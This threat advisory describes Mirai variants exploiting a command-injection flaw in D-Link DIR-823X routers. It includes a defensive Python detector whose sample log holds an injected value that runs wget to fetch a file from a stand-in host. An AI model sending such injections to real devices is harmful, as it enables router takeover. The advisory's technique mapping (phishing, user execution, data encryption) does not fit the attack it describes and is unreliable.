Threat Advisory

D-Link Devices Exploited by Mirai Malware

Threat: Malware
Targeted Region: Global
Targeted Sector: Technology & IT
Criticality: High

EXECUTIVE SUMMARY

Threat actors have been actively exploiting a command injection vulnerability in D-Link DIR-823X series routers, using it to deploy Mirai botnet variants. This campaign targets retired devices that have not been properly patched or secured, allowing the attackers to leverage a known flaw in the firmware. The goal of this campaign appears to be data theft and disruption, with the attackers using the Mirai malware to gain control over compromised devices.


The malware infects systems through a POST request to the /goform/set_prohibiting endpoint, which allows an authorized attacker to execute arbitrary commands on remote devices. Once inside, the malware uses encryption, persistence, and lateral movement to spread and maintain control over the compromised system. The attackers then use the compromised device to fetch and load a Mirai malware payload, which supports various architectures and has a hard-coded console execution string.
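The following detection logic is an added example written for this advisory; it is not code from the advisory, from D-Link or from the referenced reports. It assumes a constructed key=value log format and hypothetical form field names ("mac", "enable"); it flags POST requests to the /goform/set_prohibiting endpoint whose URL-decoded body carries shell metacharacters or download/execution keywords, which is the shape of traffic a command-injection-to-Mirai-loader chain produces.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Endpoint named in the advisory.  Form field names used in the sample
# ("mac", "enable") are hypothetical; every decoded value is inspected.
TARGET_PATH = "/goform/set_prohibiting"

# Shell metacharacters and fetch/exec keywords that never belong in a
# router configuration form value.
SHELL_META = re.compile(r"[;|&`]|\$\(|\n")
FETCH_TOOLS = re.compile(r"\b(wget|curl|tftp|ftpget|busybox|chmod)\b", re.I)

# Constructed log format (not a real D-Link or web-server format):
#   src=<ip> method=<verb> path=<uri> body="<url-encoded form body>"
LOG_RE = re.compile(
    r'src=(?P<src>\S+) method=(?P<method>\S+) path=(?P<path>\S+) body="(?P<body>.*)"$'
)

def inspect_body(body: str) -> Optional[str]:
    """Return why the decoded form body looks like command injection, or None."""
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if SHELL_META.search(value):
                return f"shell metacharacter in field {field!r}"
            if FETCH_TOOLS.search(value):
                return f"download/exec keyword in field {field!r}"
    return None

def analyse_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (source IP, reason) for POSTs to the vulnerable endpoint carrying injection markers."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or m["method"] != "POST" or m["path"] != TARGET_PATH:
            continue  # other verbs and endpoints are out of scope for this rule
        reason = inspect_body(m["body"])
        if reason:
            findings.append((m["src"], reason))
    return findings

# Constructed sample traffic (documentation-range IPs): a benign form submit,
# an injection attempt, a GET, and a POST to an unrelated endpoint.
SAMPLE_LOG = [
    'src=192.168.1.20 method=POST path=/goform/set_prohibiting body="mac=aa:bb:cc:dd:ee:ff&enable=1"',
    'src=203.0.113.9 method=POST path=/goform/set_prohibiting body="mac=aa%3Bwget+http%3A%2F%2F203.0.113.77%2Fx&enable=1"',
    'src=203.0.113.9 method=GET path=/goform/set_prohibiting body=""',
    'src=198.51.100.3 method=POST path=/goform/other body="x=%60id%60"',
]
```

Running analyse_log(SAMPLE_LOG) flags only the second line; the unrelated endpoint in the last line is ignored by design, so a broader rule should inspect every form endpoint on the device.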

This campaign is significant because it highlights the continued threat posed by Mirai malware and the importance of patching and securing retired devices. Organisations should be aware of this threat and take defensive action to prevent it. This includes regularly monitoring vulnerability disclosures relevant to their infrastructure and applying patches, upgrades, and safeguards to maintain operational security. Organisations should also implement robust endpoint protection, monitoring, and backups to detect and respond to potential threats. Additionally, organisations should ensure that their devices are properly configured and that they are not running vulnerable devices that have been retired by the vendor.

THREAT PROFILE:

Tactic                Technique ID   Technique                          Sub-technique
Resource Development  T1583          Acquire Infrastructure
Initial Access        T1566.002      Phishing                           Spearphishing Link
Execution             T1204          User Execution
Defense Evasion       T1027          Obfuscated Files or Information
Command and Control   T1105          Ingress Tool Transfer
Exfiltration          T1041          Exfiltration Over C2 Channel
Impact                T1486          Data Encrypted for Impact


REFERENCES:

The following reports contain further technical details:
https://www.helpnetsecurity.com/2026/04/22/new-mirai-variants-target-routers-and-dvrs-via-old-flaws/
https://www.akamai.com/blog/security-research/2026/apr/cve-2025-29635-mirai-campaign-targets-d-link-devices
